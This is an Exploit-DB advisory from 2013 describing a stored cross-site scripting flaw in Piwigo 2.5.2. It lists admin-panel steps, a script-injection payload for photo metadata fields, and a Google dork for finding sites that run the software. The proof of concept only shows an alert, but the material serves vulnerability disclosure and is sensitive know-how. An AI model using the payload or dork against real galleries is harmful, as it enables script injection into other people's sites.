Piwigo 2.5.2 - Cross-Site Scripting

EDB-ID:

28560

CVE:



Author:

Arsan

Type:

webapps


Platform:

PHP

Date:

2013-09-26


#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# Exploit Title: Piwigo 2.5.2 <= Cross Site Scripting
# Date: 2013 26 September
# Author: Arsan
# Software Homepage: http://www.piwigo.org
# Version : 2.5.2
# Tested on: Linux & Windows
# Category: webapps
# Google Dork: intext:"Powered by Piwigo"
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Exploit :
#
# [-] About Piwigo :
#
# Host and share your photos with Piwigo
# Piwigo is photo gallery software for the web, built by an active community of users and developers.
# Extensions make Piwigo easily customizable. Icing on the cake, Piwigo is free and opensource.
# Browse the demo (http://www.piwigo.org/demo) to discover Piwigo features on gallery side and change graphical theme on the fly.
#
# 	[-] Description :
#	
#	    1) Download "Piwigo" And Install.
#	    2) Create New Album ( Photos > Add > create a new album ) ~> Follow this link :
#	       http://localhost/piwigo/admin.php?page=photos_add
#	    3) Insert A photo In Your Album And Save It.
#	    4) And Go To Photo Edit; Follow This Way :
#	       Photos > Batch Manager > single mode
#	       http://localhost/piwigo/admin.php?page=batch_manager&mode=unit
#	    5) Now Insert This Code In "Title","Author","Tags","Description" :
#	       "><script>alert(/Arsan/)</script>
#	    6) Try To See Your Photo In Gallery;
#	       http://localhost/cms/piwigo/picture.php?/[Number Photo]/category/[Number Album]
#	    :) You See Alert "Arsan" . Enjoy ;)
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Demo :
#
# http://www.piwigo.org/demo
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Contact Me :
#
#     Arsan.Blackhat@gmail.com
#     Twitter.com/ArsanBlackhat
# 
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
# I L0ve Inj3ct0r Team
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#